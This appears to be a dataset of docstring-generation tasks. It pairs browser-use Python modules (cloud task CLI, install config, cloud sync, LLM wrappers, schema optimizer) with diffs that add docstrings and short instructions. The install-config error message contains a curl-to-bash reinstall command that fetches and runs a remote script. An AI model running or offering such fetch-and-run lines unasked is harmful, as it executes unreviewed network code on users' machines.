# Compact mode: just step number and reasoning
if memory:
# Truncate reasoning for compact display
short_memory = memory[:80] + '...' if len(memory) > 80 else memory
print(f' {step_num}. {short_memory}')
else:
print(f' {step_num}. (no reasoning)')
def _handle_stop(args: argparse.Namespace) -> int:
try:
stop_task(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'stopped': args.task_id}))
else:
print(f'Stopped task: {args.task_id}')
return 0
def _handle_logs(args: argparse.Namespace) -> int:
try:
result = get_task_logs(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'downloadUrl': result.download_url}))
else:
download_url = result.download_url
if download_url:
print(f'Download logs: {download_url}')
else:
print('No logs available for this task')
return 0 | --- +++ @@ -1,3 +1,9 @@+"""Cloud task SDK wrappers and CLI handlers.
+
+This module provides:
+- SDK wrapper functions for the Browser-Use Cloud Task API
+- CLI command handlers for `browser-use task <command>`
+"""
import argparse
import json
@@ -16,6 +22,7 @@
def _filter_none(kwargs: dict[str, Any]) -> dict[str, Any]:
+ """Filter out None values from kwargs (SDK passes them as null, API rejects)."""
return {k: v for k, v in kwargs.items() if v is not None}
@@ -23,12 +30,35 @@
def create_task(task: str, **kwargs: Any) -> TaskCreatedResponse:
+ """Create a cloud task via API.
+
+ Args:
+ task: Task description for the agent
+ llm: LLM model identifier
+ session_id: Existing session ID to use
+ max_steps: Maximum agent steps
+ flash_mode: Enable flash mode for faster execution
+ thinking: Enable extended reasoning mode
+ vision: Enable/disable vision
+ start_url: URL to start the task from
+ metadata: Task metadata key-value pairs
+ secrets: Task secrets key-value pairs
+ allowed_domains: Restrict navigation to these domains
+ skill_ids: Enable specific skill IDs
+ structured_output: JSON schema for structured output
+ judge: Enable judge mode
+ judge_ground_truth: Expected answer for judge evaluation
+
+ Returns:
+ TaskCreatedResponse with task ID and session ID
+ """
params = _filter_none(kwargs)
params['task'] = task
return get_sdk_client().tasks.create_task(**params)
def get_task(task_id: str) -> TaskView:
+ """Get full task details including steps."""
return get_sdk_client().tasks.get_task(task_id)
@@ -37,6 +67,7 @@ status: str | None = None,
session_id: str | None = None,
) -> list[TaskItemView]:
+ """List recent tasks."""
client = get_sdk_client()
response = client.tasks.list_tasks(
page_size=limit,
@@ -46,10 +77,12 @@
def stop_task(task_id: str) -> TaskView:
+ """Stop a running task."""
return get_sdk_client().tasks.update_task(task_id, action='stop')
def get_task_logs(task_id: str) -> TaskLogFileResponse:
+ """Get task execution logs."""
return get_sdk_client().tasks.get_task_logs(task_id)
@@ -58,6 +91,7 @@ stream: bool = False,
poll_interval: float = 1.0,
) -> TaskView:
+ """Poll task status until finished."""
import asyncio
client = get_sdk_client()
@@ -82,6 +116,16 @@
def handle_task_command(args: argparse.Namespace) -> int:
+ """Handle task subcommands.
+
+ Task commands manage cloud tasks and always require the cloud API.
+
+ Args:
+ args: Parsed command-line arguments
+
+ Returns:
+ Exit code (0 for success, 1 for error)
+ """
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
@@ -121,6 +165,7 @@
def _task_item_to_dict(task: Any) -> dict[str, Any]:
+ """Convert SDK TaskItemView to dict for JSON output."""
return {
'id': task.id,
'status': task.status,
@@ -130,6 +175,7 @@
def _task_to_dict(task: Any) -> dict[str, Any]:
+ """Convert SDK TaskView to dict for JSON output."""
return {
'id': task.id,
'status': task.status,
@@ -144,6 +190,7 @@
def _step_to_dict(step: Any) -> dict[str, Any]:
+ """Convert SDK step to dict for JSON output."""
return {
'number': step.number,
'url': step.url,
@@ -153,6 +200,7 @@
def _handle_list(args: argparse.Namespace) -> int:
+ """Handle 'task list' command."""
try:
status_filter = getattr(args, 'status', None)
session_filter = getattr(args, 'session', None)
@@ -200,6 +248,7 @@
def _handle_status(args: argparse.Namespace) -> int:
+ """Handle 'task status <task_id>' command."""
try:
# Use get_task() for full details including steps
task = get_task(args.task_id)
@@ -295,6 +344,7 @@
def _print_step(step: Any, verbose: bool) -> None:
+ """Print a single step in compact or verbose format."""
step_num = step.number if step.number is not None else '?'
memory = step.memory or ''
@@ -328,6 +378,7 @@
def _handle_stop(args: argparse.Namespace) -> int:
+ """Handle 'task stop <task_id>' command."""
try:
stop_task(args.task_id)
except Exception as e:
@@ -343,6 +394,7 @@
def _handle_logs(args: argparse.Namespace) -> int:
+ """Handle 'task logs <task_id>' command."""
try:
result = get_task_logs(args.task_id)
except Exception as e:
@@ -358,4 +410,4 @@ else:
print('No logs available for this task')
- return 0+ return 0
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/cloud_task.py |
Generate missing documentation strings |
import json
from pathlib import Path
from typing import Literal
CONFIG_PATH = Path.home() / '.browser-use' / 'install-config.json'
ModeType = Literal['chromium', 'real', 'remote']
# Local modes (both require Chromium to be installed)
LOCAL_MODES: set[str] = {'chromium', 'real'}
def get_config() -> dict:
if not CONFIG_PATH.exists():
return {
'installed_modes': ['chromium', 'real', 'remote'],
'default_mode': 'chromium',
}
try:
return json.loads(CONFIG_PATH.read_text())
except (json.JSONDecodeError, OSError):
# Config file corrupt, return default
return {
'installed_modes': ['chromium', 'real', 'remote'],
'default_mode': 'chromium',
}
def save_config(installed_modes: list[str], default_mode: str) -> None:
CONFIG_PATH.parent.mkdir(parents=True, exist_ok=True)
CONFIG_PATH.write_text(
json.dumps(
{
'installed_modes': installed_modes,
'default_mode': default_mode,
},
indent=2,
)
)
def is_mode_available(mode: str) -> bool:
config = get_config()
installed = config.get('installed_modes', [])
# Map 'real' to same category as 'chromium' (both are local)
# If either local mode is installed, both are available
if mode in LOCAL_MODES:
return bool(LOCAL_MODES & set(installed))
return mode in installed
def get_default_mode() -> str:
return get_config().get('default_mode', 'chromium')
def get_available_modes() -> list[str]:
return get_config().get('installed_modes', ['chromium', 'real', 'remote'])
def get_mode_unavailable_error(mode: str) -> str:
available = get_available_modes()
if mode in LOCAL_MODES:
install_flag = '--full'
mode_desc = 'Local browser mode'
else:
install_flag = '--full'
mode_desc = 'Remote browser mode'
return (
f"Error: {mode_desc} '{mode}' not installed.\n"
f'Available modes: {", ".join(available)}\n\n'
f'To install all modes, reinstall with:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- {install_flag}'
) | --- +++ @@ -1,3 +1,12 @@+"""Install configuration - tracks which browser modes are available.
+
+This module manages the installation configuration that determines which browser
+modes (chromium, real, remote) are available based on how browser-use was installed.
+
+Config file: ~/.browser-use/install-config.json
+
+When no config file exists (e.g., pip install users), all modes are available by default.
+"""
import json
from pathlib import Path
@@ -12,6 +21,10 @@
def get_config() -> dict:
+ """Read install config. Returns default if not found.
+
+ Default config enables all modes (for pip install users).
+ """
if not CONFIG_PATH.exists():
return {
'installed_modes': ['chromium', 'real', 'remote'],
@@ -29,6 +42,7 @@
def save_config(installed_modes: list[str], default_mode: str) -> None:
+ """Save install config."""
CONFIG_PATH.parent.mkdir(parents=True, exist_ok=True)
CONFIG_PATH.write_text(
json.dumps(
@@ -42,6 +56,14 @@
def is_mode_available(mode: str) -> bool:
+ """Check if a browser mode is available based on installation config.
+
+ Args:
+ mode: The browser mode to check ('chromium', 'real', or 'remote')
+
+ Returns:
+ True if the mode is available, False otherwise
+ """
config = get_config()
installed = config.get('installed_modes', [])
@@ -54,14 +76,24 @@
def get_default_mode() -> str:
+ """Get the default browser mode based on installation config."""
return get_config().get('default_mode', 'chromium')
def get_available_modes() -> list[str]:
+ """Get list of available browser modes."""
return get_config().get('installed_modes', ['chromium', 'real', 'remote'])
def get_mode_unavailable_error(mode: str) -> str:
+ """Generate a helpful error message when a mode is not available.
+
+ Args:
+ mode: The unavailable mode that was requested
+
+ Returns:
+ A formatted error message with instructions for reinstalling
+ """
available = get_available_modes()
if mode in LOCAL_MODES:
@@ -76,4 +108,4 @@ f'Available modes: {", ".join(available)}\n\n'
f'To install all modes, reinstall with:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- {install_flag}'
- )+ )
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/install_config.py |
Turn comments into proper docstrings |
import logging
import httpx
from bubus import BaseEvent
from browser_use.config import CONFIG
from browser_use.sync.auth import TEMP_USER_ID, DeviceAuthClient
logger = logging.getLogger(__name__)
class CloudSync:
def __init__(self, base_url: str | None = None, allow_session_events_for_auth: bool = False):
# Backend API URL for all API requests - can be passed directly or defaults to env var
self.base_url = base_url or CONFIG.BROWSER_USE_CLOUD_API_URL
self.auth_client = DeviceAuthClient(base_url=self.base_url)
self.session_id: str | None = None
self.allow_session_events_for_auth = allow_session_events_for_auth
self.auth_flow_active = False # Flag to indicate auth flow is running
# Check if cloud sync is actually enabled - if not, we should remain silent
self.enabled = CONFIG.BROWSER_USE_CLOUD_SYNC
async def handle_event(self, event: BaseEvent) -> None:
try:
# If cloud sync is disabled, don't handle any events
if not self.enabled:
return
# Extract session ID from CreateAgentSessionEvent
if event.event_type == 'CreateAgentSessionEvent' and hasattr(event, 'id'):
self.session_id = str(event.id) # type: ignore
# Send events based on authentication status and context
if self.auth_client.is_authenticated:
# User is authenticated - send all events
await self._send_event(event)
elif self.allow_session_events_for_auth:
# Special case: allow ALL events during auth flow
await self._send_event(event)
# Mark auth flow as active when we see a session event
if event.event_type == 'CreateAgentSessionEvent':
self.auth_flow_active = True
else:
# User is not authenticated and no auth in progress - don't send anything
logger.debug(f'Skipping event {event.event_type} - user not authenticated')
except Exception as e:
logger.error(f'Failed to handle {event.event_type} event: {type(e).__name__}: {e}', exc_info=True)
async def _send_event(self, event: BaseEvent) -> None:
try:
headers = {}
# Override user_id only if it's not already set to a specific value
# This allows CLI and other code to explicitly set temp user_id when needed
if self.auth_client and self.auth_client.is_authenticated:
# Only override if we're fully authenticated and event doesn't have temp user_id
current_user_id = getattr(event, 'user_id', None)
if current_user_id != TEMP_USER_ID:
setattr(event, 'user_id', str(self.auth_client.user_id))
else:
# Set temp user_id if not already set
if not hasattr(event, 'user_id') or not getattr(event, 'user_id', None):
setattr(event, 'user_id', TEMP_USER_ID)
# Add auth headers if available
if self.auth_client:
headers.update(self.auth_client.get_headers())
# Send event (batch format with direct BaseEvent serialization)
async with httpx.AsyncClient() as client:
# Serialize event and add device_id to all events
event_data = event.model_dump(mode='json')
if self.auth_client and self.auth_client.device_id:
event_data['device_id'] = self.auth_client.device_id
response = await client.post(
f'{self.base_url.rstrip("/")}/api/v1/events',
json={'events': [event_data]},
headers=headers,
timeout=10.0,
)
if response.status_code >= 400:
# Log error but don't raise - we want to fail silently
logger.debug(
f'Failed to send sync event: POST {response.request.url} {response.status_code} - {response.text}'
)
except httpx.TimeoutException:
logger.debug(f'Event send timed out after 10 seconds: {event}')
except httpx.ConnectError as e:
# logger.warning(f'⚠️ Failed to connect to cloud service at {self.base_url}: {e}')
pass
except httpx.HTTPError as e:
logger.debug(f'HTTP error sending event {event}: {type(e).__name__}: {e}')
except Exception as e:
logger.debug(f'Unexpected error sending event {event}: {type(e).__name__}: {e}')
# async def _update_wal_user_ids(self, session_id: str) -> None:
# """Update user IDs in WAL file after authentication"""
# try:
# assert self.auth_client, 'Cloud sync must be authenticated to update WAL user ID'
# wal_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'events' / f'{session_id}.jsonl'
# if not await anyio.Path(wal_path).exists():
# raise FileNotFoundError(
# f'CloudSync failed to update saved event user_ids after auth: Agent EventBus WAL file not found: {wal_path}'
# )
# # Read all events
# events = []
# content = await anyio.Path(wal_path).read_text()
# for line in content.splitlines():
# if line.strip():
# events.append(json.loads(line))
# # Update user_id and device_id
# user_id = self.auth_client.user_id
# device_id = self.auth_client.device_id
# for event in events:
# if 'user_id' in event:
# event['user_id'] = user_id
# # Add device_id to all events
# event['device_id'] = device_id
# # Write back
# updated_content = '\n'.join(json.dumps(event) for event in events) + '\n'
# await anyio.Path(wal_path).write_text(updated_content)
# except Exception as e:
# logger.warning(f'Failed to update WAL user IDs: {e}')
def set_auth_flow_active(self) -> None:
self.auth_flow_active = True
async def authenticate(self, show_instructions: bool = True) -> bool:
# If cloud sync is disabled, don't authenticate
if not self.enabled:
return False
# Check if already authenticated first
if self.auth_client.is_authenticated:
import logging
logger = logging.getLogger(__name__)
if show_instructions:
logger.info('✅ Already authenticated! Skipping OAuth flow.')
return True
# Not authenticated - run OAuth flow
return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions) | --- +++ @@ -1,3 +1,6 @@+"""
+Cloud sync service for sending events to the Browser Use cloud.
+"""
import logging
@@ -11,6 +14,7 @@
class CloudSync:
+ """Service for syncing events to the Browser Use cloud"""
def __init__(self, base_url: str | None = None, allow_session_events_for_auth: bool = False):
# Backend API URL for all API requests - can be passed directly or defaults to env var
@@ -23,6 +27,7 @@ self.enabled = CONFIG.BROWSER_USE_CLOUD_SYNC
async def handle_event(self, event: BaseEvent) -> None:
+ """Handle an event by sending it to the cloud"""
try:
# If cloud sync is disabled, don't handle any events
if not self.enabled:
@@ -50,6 +55,7 @@ logger.error(f'Failed to handle {event.event_type} event: {type(e).__name__}: {e}', exc_info=True)
async def _send_event(self, event: BaseEvent) -> None:
+ """Send event to cloud API"""
try:
headers = {}
@@ -133,9 +139,11 @@ # logger.warning(f'Failed to update WAL user IDs: {e}')
def set_auth_flow_active(self) -> None:
+ """Mark auth flow as active to allow all events"""
self.auth_flow_active = True
async def authenticate(self, show_instructions: bool = True) -> bool:
+ """Authenticate with the cloud service"""
# If cloud sync is disabled, don't authenticate
if not self.enabled:
return False
@@ -150,4 +158,4 @@ return True
# Not authenticated - run OAuth flow
- return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions)+ return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/sync/service.py |
Generate docstrings for exported functions |
import logging
from typing import TYPE_CHECKING, Any
if TYPE_CHECKING:
from browser_use.skill_cli.sessions import SessionRegistry
logger = logging.getLogger(__name__)
COMMANDS = {'sessions', 'close'}
async def handle(action: str, session_name: str, registry: 'SessionRegistry', params: dict[str, Any]) -> Any:
if action == 'sessions':
sessions = registry.list_sessions()
return {
'sessions': sessions,
'count': len(sessions),
}
elif action == 'close':
if params.get('all'):
# Close all sessions and signal shutdown
sessions = registry.list_sessions()
await registry.close_all()
return {
'closed': [s['name'] for s in sessions],
'count': len(sessions),
'_shutdown': True, # Signal to stop server
}
else:
# Close this server's session and shutdown
await registry.close_session(session_name)
return {'closed': session_name, '_shutdown': True}
raise ValueError(f'Unknown session action: {action}') | --- +++ @@ -1,3 +1,4 @@+"""Session management command handlers."""
import logging
from typing import TYPE_CHECKING, Any
@@ -11,6 +12,7 @@
async def handle(action: str, session_name: str, registry: 'SessionRegistry', params: dict[str, Any]) -> Any:
+ """Handle session management command."""
if action == 'sessions':
sessions = registry.list_sessions()
return {
@@ -33,4 +35,4 @@ await registry.close_session(session_name)
return {'closed': session_name, '_shutdown': True}
- raise ValueError(f'Unknown session action: {action}')+ raise ValueError(f'Unknown session action: {action}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/session.py |
Help me comply with documentation standards |
from typing import Any
from pydantic import BaseModel
class SchemaOptimizer:
@staticmethod
def create_optimized_json_schema(
model: type[BaseModel],
*,
remove_min_items: bool = False,
remove_defaults: bool = False,
) -> dict[str, Any]:
# Generate original schema
original_schema = model.model_json_schema()
# Extract $defs for reference resolution, then flatten everything
defs_lookup = original_schema.get('$defs', {})
# Create optimized schema with flattening
# Pass flags to optimize_schema via closure
def optimize_schema(obj: Any, defs_lookup: dict[str, Any] | None = None, *, in_properties: bool = False) -> Any:
if isinstance(obj, dict):
optimized: dict[str, Any] = {}
flattened_ref: dict[str, Any] | None = None
# Skip unnecessary fields AND $defs (we'll inline everything)
skip_fields = ['additionalProperties', '$defs']
for key, value in obj.items():
if key in skip_fields:
continue
# Skip metadata "title" unless we're iterating inside an actual `properties` map
if key == 'title' and not in_properties:
continue
# Preserve FULL descriptions without truncation, skip empty ones
elif key == 'description':
if value: # Only include non-empty descriptions
optimized[key] = value
# Handle type field - must recursively process in case value contains $ref
elif key == 'type':
optimized[key] = value if not isinstance(value, (dict, list)) else optimize_schema(value, defs_lookup)
# FLATTEN: Resolve $ref by inlining the actual definition
elif key == '$ref' and defs_lookup:
ref_path = value.split('/')[-1] # Get the definition name from "#/$defs/SomeName"
if ref_path in defs_lookup:
# Get the referenced definition and flatten it
referenced_def = defs_lookup[ref_path]
flattened_ref = optimize_schema(referenced_def, defs_lookup)
# Skip minItems/min_items and default if requested (check BEFORE processing)
elif key in ('minItems', 'min_items') and remove_min_items:
continue # Skip minItems/min_items
elif key == 'default' and remove_defaults:
continue # Skip default values
# Keep all anyOf structures (action unions) and resolve any $refs within
elif key == 'anyOf' and isinstance(value, list):
optimized[key] = [optimize_schema(item, defs_lookup) for item in value]
# Recursively optimize nested structures
elif key in ['properties', 'items']:
optimized[key] = optimize_schema(
value,
defs_lookup,
in_properties=(key == 'properties'),
)
# Keep essential validation fields
elif key in [
'type',
'required',
'minimum',
'maximum',
'minItems',
'min_items',
'maxItems',
'pattern',
'default',
]:
optimized[key] = value if not isinstance(value, (dict, list)) else optimize_schema(value, defs_lookup)
# Recursively process all other fields
else:
optimized[key] = optimize_schema(value, defs_lookup) if isinstance(value, (dict, list)) else value
# If we have a flattened reference, merge it with the optimized properties
if flattened_ref is not None and isinstance(flattened_ref, dict):
# Start with the flattened reference as the base
result = flattened_ref.copy()
# Merge in any sibling properties that were processed
for key, value in optimized.items():
# Preserve descriptions from the original object if they exist
if key == 'description' and 'description' not in result:
result[key] = value
elif key != 'description': # Don't overwrite description from flattened ref
result[key] = value
return result
else:
# No $ref, just return the optimized object
# CRITICAL: Add additionalProperties: false to ALL objects for OpenAI strict mode
if optimized.get('type') == 'object':
optimized['additionalProperties'] = False
return optimized
elif isinstance(obj, list):
return [optimize_schema(item, defs_lookup, in_properties=in_properties) for item in obj]
return obj
optimized_result = optimize_schema(original_schema, defs_lookup)
# Ensure we have a dictionary (should always be the case for schema root)
if not isinstance(optimized_result, dict):
raise ValueError('Optimized schema result is not a dictionary')
optimized_schema: dict[str, Any] = optimized_result
# Additional pass to ensure ALL objects have additionalProperties: false
def ensure_additional_properties_false(obj: Any) -> None:
if isinstance(obj, dict):
# If it's an object type, ensure additionalProperties is false
if obj.get('type') == 'object':
obj['additionalProperties'] = False
# Recursively apply to all values
for value in obj.values():
if isinstance(value, (dict, list)):
ensure_additional_properties_false(value)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, (dict, list)):
ensure_additional_properties_false(item)
ensure_additional_properties_false(optimized_schema)
SchemaOptimizer._make_strict_compatible(optimized_schema)
# Final pass to remove minItems/min_items and default values if requested
if remove_min_items or remove_defaults:
def remove_forbidden_fields(obj: Any) -> None:
if isinstance(obj, dict):
# Remove forbidden keys
if remove_min_items:
obj.pop('minItems', None)
obj.pop('min_items', None)
if remove_defaults:
obj.pop('default', None)
# Recursively process all values
for value in obj.values():
if isinstance(value, (dict, list)):
remove_forbidden_fields(value)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, (dict, list)):
remove_forbidden_fields(item)
remove_forbidden_fields(optimized_schema)
return optimized_schema
@staticmethod
def _make_strict_compatible(schema: dict[str, Any] | list[Any]) -> None:
if isinstance(schema, dict):
# First recursively apply to nested objects
for key, value in schema.items():
if isinstance(value, (dict, list)) and key != 'required':
SchemaOptimizer._make_strict_compatible(value)
# Then update required for this level
if 'properties' in schema and 'type' in schema and schema['type'] == 'object':
# Add all properties to required array
all_props = list(schema['properties'].keys())
schema['required'] = all_props # Set all properties as required
elif isinstance(schema, list):
for item in schema:
SchemaOptimizer._make_strict_compatible(item)
@staticmethod
def create_gemini_optimized_schema(model: type[BaseModel]) -> dict[str, Any]:
return SchemaOptimizer.create_optimized_json_schema(model) | --- +++ @@ -1,3 +1,6 @@+"""
+Utilities for creating optimized Pydantic schemas for LLM usage.
+"""
from typing import Any
@@ -12,6 +15,18 @@ remove_min_items: bool = False,
remove_defaults: bool = False,
) -> dict[str, Any]:
+ """
+ Create the most optimized schema by flattening all $ref/$defs while preserving
+ FULL descriptions and ALL action definitions. Also ensures OpenAI strict mode compatibility.
+
+ Args:
+ model: The Pydantic model to optimize
+ remove_min_items: If True, remove minItems from the schema
+ remove_defaults: If True, remove default values from the schema
+
+ Returns:
+ Optimized schema with all $refs resolved and strict mode compatibility
+ """
# Generate original schema
original_schema = model.model_json_schema()
@@ -21,6 +36,7 @@ # Create optimized schema with flattening
# Pass flags to optimize_schema via closure
def optimize_schema(obj: Any, defs_lookup: dict[str, Any] | None = None, *, in_properties: bool = False) -> Any:
+ """Apply all optimization techniques including flattening all $ref/$defs"""
if isinstance(obj, dict):
optimized: dict[str, Any] = {}
flattened_ref: dict[str, Any] | None = None
@@ -125,6 +141,7 @@
# Additional pass to ensure ALL objects have additionalProperties: false
def ensure_additional_properties_false(obj: Any) -> None:
+ """Ensure all objects have additionalProperties: false"""
if isinstance(obj, dict):
# If it's an object type, ensure additionalProperties is false
if obj.get('type') == 'object':
@@ -146,6 +163,7 @@ if remove_min_items or remove_defaults:
def remove_forbidden_fields(obj: Any) -> None:
+ """Recursively remove minItems/min_items and default values"""
if isinstance(obj, dict):
# Remove forbidden keys
if remove_min_items:
@@ -168,6 +186,7 @@
@staticmethod
def _make_strict_compatible(schema: dict[str, Any] | list[Any]) -> None:
+ """Ensure all properties are required for OpenAI strict mode"""
if isinstance(schema, dict):
# First recursively apply to nested objects
for key, value in schema.items():
@@ -186,4 +205,14 @@
@staticmethod
def create_gemini_optimized_schema(model: type[BaseModel]) -> dict[str, Any]:
- return SchemaOptimizer.create_optimized_json_schema(model)+ """
+ Create Gemini-optimized schema, preserving explicit `required` arrays so Gemini
+ respects mandatory fields defined by the caller.
+
+ Args:
+ model: The Pydantic model to optimize
+
+ Returns:
+ Optimized schema suitable for Gemini structured output
+ """
+ return SchemaOptimizer.create_optimized_json_schema(model)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/schema.py |
Add well-formatted docstrings | from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, TypeVar, overload
import httpx
from openai import APIConnectionError, APIStatusError, AsyncOpenAI, RateLimitError
from openai.types.chat.chat_completion import ChatCompletion
from openai.types.shared_params.response_format_json_schema import (
JSONSchema,
ResponseFormatJSONSchema,
)
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openrouter.serializer import OpenRouterMessageSerializer
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOpenRouter(BaseChatModel):
# Model configuration
model: str
# Model params
temperature: float | None = None
top_p: float | None = None
seed: int | None = None
# Client initialization parameters
api_key: str | None = None
http_referer: str | None = None # OpenRouter specific parameter for tracking
base_url: str | httpx.URL = 'https://openrouter.ai/api/v1'
timeout: float | httpx.Timeout | None = None
max_retries: int = 10
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
extra_body: dict[str, Any] | None = None
# Static
@property
def provider(self) -> str:
return 'openrouter'
def _get_client_params(self) -> dict[str, Any]:
# Define base client params
base_params = {
'api_key': self.api_key,
'base_url': self.base_url,
'timeout': self.timeout,
'max_retries': self.max_retries,
'default_headers': self.default_headers,
'default_query': self.default_query,
'_strict_response_validation': self._strict_response_validation,
'top_p': self.top_p,
'seed': self.seed,
}
# Create client_params dict with non-None values
client_params = {k: v for k, v in base_params.items() if v is not None}
# Add http_client if provided
if self.http_client is not None:
client_params['http_client'] = self.http_client
return client_params
def get_client(self) -> AsyncOpenAI:
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
return self._client
@property
def name(self) -> str:
return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
if response.usage is None:
return None
prompt_details = getattr(response.usage, 'prompt_tokens_details', None)
cached_tokens = prompt_details.cached_tokens if prompt_details else None
return ChatInvokeUsage(
prompt_tokens=response.usage.prompt_tokens,
prompt_cached_tokens=cached_tokens,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
# Completion
completion_tokens=response.usage.completion_tokens,
total_tokens=response.usage.total_tokens,
)
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
openrouter_messages = OpenRouterMessageSerializer.serialize_messages(messages)
# Set up extra headers for OpenRouter
extra_headers = {}
if self.http_referer:
extra_headers['HTTP-Referer'] = self.http_referer
try:
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openrouter_messages,
temperature=self.temperature,
top_p=self.top_p,
seed=self.seed,
extra_headers=extra_headers,
**(self.extra_body or {}),
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=response.choices[0].message.content or '',
usage=usage,
)
else:
# Create a JSON schema for structured output
schema = SchemaOptimizer.create_optimized_json_schema(output_format)
response_format_schema: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': schema,
}
# Return structured response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=openrouter_messages,
temperature=self.temperature,
top_p=self.top_p,
seed=self.seed,
response_format=ResponseFormatJSONSchema(
json_schema=response_format_schema,
type='json_schema',
),
extra_headers=extra_headers,
**(self.extra_body or {}),
)
if response.choices[0].message.content is None:
raise ModelProviderError(
message='Failed to parse structured output from model response',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(response.choices[0].message.content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
)
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -23,6 +23,12 @@
@dataclass
class ChatOpenRouter(BaseChatModel):
+ """
+ A wrapper around OpenRouter's chat API, which provides access to various LLM models
+ through a unified OpenAI-compatible interface.
+
+ This class implements the BaseChatModel protocol for OpenRouter's API.
+ """
# Model configuration
model: str
@@ -50,6 +56,7 @@ return 'openrouter'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
# Define base client params
base_params = {
'api_key': self.api_key,
@@ -73,6 +80,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client configured for OpenRouter.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client with OpenRouter base URL.
+ """
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
@@ -83,6 +96,7 @@ return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
+ """Extract usage information from the OpenRouter response."""
if response.usage is None:
return None
@@ -110,6 +124,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages through OpenRouter.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
openrouter_messages = OpenRouterMessageSerializer.serialize_messages(messages)
# Set up extra headers for OpenRouter
@@ -186,4 +210,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openrouter/chat.py |
Write proper docstrings for these functions | from openai.types.chat import ChatCompletionMessageParam
from browser_use.llm.messages import BaseMessage
from browser_use.llm.openai.serializer import OpenAIMessageSerializer
class VercelMessageSerializer:
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
# Vercel AI Gateway uses the same message format as OpenAI
return OpenAIMessageSerializer.serialize_messages(messages) | --- +++ @@ -5,8 +5,22 @@
class VercelMessageSerializer:
+ """
+ Serializer for converting between custom message types and Vercel AI Gateway message formats.
+
+ Vercel AI Gateway uses the OpenAI-compatible API, so we can reuse the OpenAI serializer.
+ """
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
+ """
+ Serialize a list of browser_use messages to Vercel AI Gateway-compatible messages.
+
+ Args:
+ messages: List of browser_use messages
+
+ Returns:
+ List of Vercel AI Gateway-compatible messages (identical to OpenAI format)
+ """
# Vercel AI Gateway uses the same message format as OpenAI
- return OpenAIMessageSerializer.serialize_messages(messages)+ return OpenAIMessageSerializer.serialize_messages(messages)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/vercel/serializer.py |
Add docstrings that explain logic |
import logging
import os
from typing import Any
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.sessions import SessionInfo
